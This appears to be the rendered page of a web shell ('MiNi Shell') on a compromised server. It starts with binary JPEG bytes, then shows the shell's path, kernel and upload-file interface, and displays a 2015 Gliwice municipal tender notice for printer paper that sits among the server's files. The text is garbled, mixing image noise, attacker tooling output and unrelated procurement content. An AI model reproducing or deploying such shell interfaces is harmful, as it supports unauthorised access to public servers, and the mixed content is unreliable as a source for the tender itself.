JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151110/304010-N-2015.html

<p class="kh_header"><b>Gliwice: Dostawa papieru do urządzeń drukujących na potrzeby Urzędu Miejskiego w Gliwicach oraz miejskich jednostek organizacyjnych w okresie 12 miesięcy</b><br>
<b>Numer ogłoszenia: 304010 - 2015; data zamieszczenia: 10.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Gliwice, Wydział Zamówień Publicznych , Ul. Zwycięstwa 21, 44-100 Gliwice, woj. śląskie, tel. 32 238 55 30, faks 32 238 55 27.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gliwice.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa papieru do urządzeń drukujących na potrzeby Urzędu Miejskiego w Gliwicach oraz miejskich jednostek organizacyjnych w okresie 12 miesięcy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa papieru do urządzeń drukujących na potrzeby Urzędu Miejskiego w Gliwicach oraz miejskich jednostek organizacyjnych w okresie 12 miesięcy.

Wielkość zamówienia:
1) (PRO-1385) PAPIER A3 biały DO DRUKAREK LASEROWYCH, gramatura 160 +/-3 g/m2, grubość od 156 do 160 mic, białość min. 166 CIE (z obu stron), nieprzezroczystość min. 95 %, opakowanie zawiera 250 arkuszy - 36 opak. 
2) (PRO-1377) PAPIER A3 DO DRUKAREK LASEROWYCH, kolorowych i monochromatycznych gramatura 80 +/- 2 g/m2, grubość od 103 do 111 mic, białość min. 159 CIE (z obu stron), nieprzezroczystość min. 91 %, wilgotność 3,5-5,0 %, gładkość od 130 do 250 cm3/min (z obu stron), ryza zawiera 500 arkuszy - 418 ryz
3) (PRO-1386) Papier A3 ksero kolory intensywne, gramatura 80 +/-2 g/m2, ryza zawiera 500 arkuszy - 20 ryz
4) (PRO-1389) Papier A3 ksero kolory pastelowe, gramatura 80 +/- 2 g/m2, ryza zawiera 500 arkuszy - 25 ryz
5) (PRO-1387) PAPIER A4 biały DO DRUKAREK LASEROWYCH, gramatura 160 +/- 3 g/m2, grubość od 156 do 160 mic, białość min. 166 CIE (z obu stron), nieprzezroczystość min. 95 %,  opakowanie zawiera 250 arkuszy - 289 opak. 
6) (PRO-1362) PAPIER A4 DO DRUKAREK LASEROWYCH, kolorowych i monochromatycznych gramatura 80 +/- 2 g/m2, grubość od 103 do 111 mic, białość min. 159 CIE (z obu stron), nieprzezroczystość min. 91 %, wilgotność 3,5-5,0 %, gładkość od 130 do 250 cm3/min (z obu stron), ryza zawiera 500 arkuszy, 18967 ryz
7) (PRO-1384) PAPIER A4 KSERO KOLOR gramatura 80 +/-2 g/m2 (kolory intensywne: czerwony, żółty, zielony, niebieski, pomarańczowy, różowy), w ryzie 1 kolor, ryza zawiera 500 arkuszy - 184 ryz
8) (PRO-1376) PAPIER A4 KSERO KOLOR gramatura 80 +/-2 g/m2 (kolory pastelowe: żółty, zielony, niebieski, różowy), w ryzie 1 kolor, ryza zawiera 500 arkuszy - 164 ryz
9) (PRO-1391) Papier A4 ksero kolory intensywne, gramatura 120 +/-2 g/m2, opakowanie zawiera 250 arkuszy - 94 opak. 
10) (PRO-1390) Papier A4 ksero kolory pastelowe, gramatura 120 +/-2 g/m2, opakowanie zawiera 250 arkuszy - 107 opak. 
11) (PRO-1363) PAPIER DO DRUKAREK IGŁOWYCH komputerowy, bezdrzewny, bezpyłowy, nietoksyczny, bez nadruku format: 240x12 cali , ilość składanek: 600, ilość warstw: 3 - 33 opak. 
12) (PRO-1374) PAPIER DO DRUKAREK IGŁOWYCH komputerowy, bezdrzewny, bezpyłowy, nietoksyczny, bez nadruku format: 240x12 cali, ilość składanek: 900, ilość warstw: 2 - 19 opak. 
13) (PRO-1365) PAPIER DO DRUKAREK IGŁOWYCH komputerowy, bezdrzewny, bezpyłowy, nietoksyczny, bez nadruku format: 240x12 cali, ilość składanek: 2000, ilość warstw: 1 - 26 opak. 
14) (PRO-1380) PAPIER DO DRUKAREK IGŁOWYCH komputerowy, bezdrzewny, bezpyłowy, nietoksyczny, bez nadruku format: 360x12 cali, ilość składanek: 2000, ilość warstw: 1 - 2 opak. 
15) (PRO-1383) PAPIER DO DRUKAREK IGŁOWYCH komputerowy, bezdrzewny, bezpyłowy, nietoksyczny, bez nadruku format: 375x12 cali, ilość składanek: 2000, ilość warstw: 1 - 12 opak. 
16) (PRO-1395) Papier do drukarek igłowych komputerowy, bezdrzewny, bezpyłowy, nietoksyczny, kolor bez nadruku, format: 240x6, ilość składanek: 1800, ilość warstw: 2 - 77 opak. 
17) (PRO-1388) Papier do plotera w kolorze białym, format A1, szerokość: 610mm, długość: 50m, gramatura min. 90 g/m2, szerokość glizy: 2cale - 8 rolek
18) (PRO-1378) Papier FAX, gramatura 55g/m2, wymiary: 15m x 210 mm - 25 rolek
19) (PRO-1372) Papier FAX, gramatura 55g/m2, wymiary: 30m x 210mm - 96 rolek
20) (PRO-1373) Papier FAX, gramatura 55g/m2, wymiary: 30m x 216mm - 32 rolek
21) (PRO-1364) PAPIER KSERO A3 DO DRUKAREK ATRAMENTOWYCH, gramatura 80 +/-2 g/m2, grubość od 100 do 111 mic, białość min. 146 CIE (z obu stron), nieprzezroczystość min. 90 %, ryza zawiera 500 ark. - 211 ryz
22) (PRO-1369) PAPIER KSERO A4 BIAŁY, np. do wizytówek, dyplomów, gramatura 250 +/-2 g/m2, opakowanie zawiera 250 arkuszy - 107 opak. 
23) (PRO-1382) PAPIER KSERO A4 DO DRUKAREK ATRAMENTOWYCH, gramatura 80 +/-2 g/m2, grubość od 100 do 111 mic, białość min. 146 CIE (z obu stron), nieprzezroczystość min. 90 %, ryza zawiera 500 arkuszy - 5155 ryz
24) (PRO-1381) PAPIER KSERO A4 MIX KOLORÓW INTENSYWNYCH, gramatura 80 +/-2 g/m2 (kolory:czerwony, żółty, zielony, niebieski, pomarańczowy, różowy), w ryzie min. 4 kolory, opakowanie zawiera 100 arkuszy - 170 opak. 
25) (PRO-1379) PAPIER KSERO A4 MIX KOLORÓW PASTELOWYCH, gramatura 80 +/- 2 g/m2 (kolory: żółty, zielony, niebieski, różowy), w ryzie min. 4 kolory, opakowanie zawiera 100 arkuszy - 157 opak. 
26) (PRO-1415) Papier ozdobny format A-4, np. do zaproszeń, dyplomów, kart okolicznościowych, powlekany z dodatkiem perłowego pigmentu, tłoczony jednostronnie, gramatura 215 +/- 2 g/m2, kolor srebrny, opakowanie zawiera 20 arkuszy - 30 opak. 
27) (PRO-1416) Papier ozdobny format A-4, np. do zaproszeń, dyplomów, wizytówek, metalizowany obustronnie, gramatura 120 +/- 2 g/m2, kolor: kremowy, złoty, opakowanie zawiera 20 arkuszy - 33 opak. 
28) (PRO-1366) Papier w rolce, gramatura 80 g/m2, wymiary 175 m x 420 mm, średnica rolki 76 mm - 8 rolek
29) (PRO-1370) PAPIER W ROLCE, gramatura 80 g/m2, wymiary 175 m x 914 mm, średnica rolki 76 mm - 2 rolek
30) (PRO-1367) Papier w rolce, gramatura 90 g/m2, 50 m x 594 mm, średnica rolki 76 mm - 1 rolka 
31) (PRO-1394) Papier w rolce, gramatura 90 g/m2, wymiary 50 m x 1118 mm, średnica rolki 50 mm - 3 rolek
32) (PRO-1368) Papier w rolce, gramatura 90 g/m2, wymiary 50 m x 610 mm, średnica rolki 76 mm - 4 rolek
33) (PRO-1371) Papier w rolce, gramatura 90 g/m2, wymiary 50 m x 914 mm, średnica rolki 76 mm - 8 rolek..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.30-1, 30.19.76.44-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o zamówienie mogą ubiegać się wykonawcy, których wiedza i doświadczenie pozwoli na prawidłowe wykonanie zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o zamówienie mogą ubiegać się wykonawcy, których potencjał techniczny pozwoli na prawidłowe wykonanie zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o zamówienie mogą ubiegać się wykonawcy, którzy dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o zamówienie mogą ubiegać się wykonawcy, których sytuacja ekonomiczna i finansowa pozwoli na prawidłowe wykonanie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. Pisemne zobowiązanie lub inne dokumenty muszą zawierać informacje dotyczące co najmniej: - zakresu dostępnych wykonawcy zasobów innego podmiotu, - sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, - charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, - zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Kupujący dopuszcza zmianę umowy w przedmiocie zamówienia i zaoferowaniu produktów innych niż wycenione przez Sprzedawcę w formularzu cenowym stanowiącym załącznik nr 1 do umowy, w przypadku gdy produkty wyszczególnione w formularzu zostaną wycofane z produkcji lub będą czasowo niedostępne na rynku lub zostaną zastąpione przez inne produkty. Nowo zaoferowane produkty muszą posiadać parametry nie gorsze niż opisane w przedmiotowym formularzu i spełniać wszystkie wymagania w nim zawarte. Dopuszczalna jest również zmiana cen jednostkowych w zakresie nowo oferowanych produktów, jednak ceny nie mogą być wyższe od cen przedstawionych w dniu składania oferty. Sprzedawca przed dokonaniem dostawy zobowiązany będzie uzyskać na piśmie, faksem lub mailem akceptację Kupującego na zmianę w przedmiocie umowy i zaoferowaniu innych produktów, wykazując, że nowo zaoferowane produkty posiadają wszystkie parametry opisane w załączniku nr 1 do niniejszej umowy.
W przypadku braku akceptacji, Sprzedawca winien dostarczać przedmiot zamówienia zgodny z przedstawioną ofertą przetargową.
2. Dostarczenie produktów innych niż wymienione w załączniku nr 1 do niniejszej umowy bez uprzedniej zgody Kupującego będzie traktowane jako dostarczenie towaru wadliwego.
3. Kupujący przewiduje zmianę danych zawartych w załączniku nr 2 do umowy. W przypadku zmiany miejsca dostaw towaru Kupujący określi nowe miejsce dostawy towaru na obszarze miasta Gliwice.
4. Kupujący przewiduje możliwość dokonania zmiany umowy w zakresie zmiany płatnika.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.gliwice.eu w dziale Przetargi/Zamówienia publiczne Urzedu Miejskiego<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> sekretariat Wydziału Zamówień Publicznych Urzędu Miejskiego w Gliwicach,
ul. Zwycięstwa 21, 44-100 Gliwice, III piętro, pokój 363.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.11.2015 godzina 09:00, miejsce: sekretariat Wydziału Zamówień Publicznych Urzędu Miejskiego w Gliwicach,
ul. Zwycięstwa 21, 44-100 Gliwice, III piętro, pokój 363.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający wykluczy z postępowania o udzielenie zamówienia wykonawców, którzy w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszyli obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonali lub nienależycie wykonali zamówienie, co zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wykluczy z postępowania o udzielenie zamówienia wykonawców, który udowodnią, że podjęli konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawili szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązali się do ich naprawienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com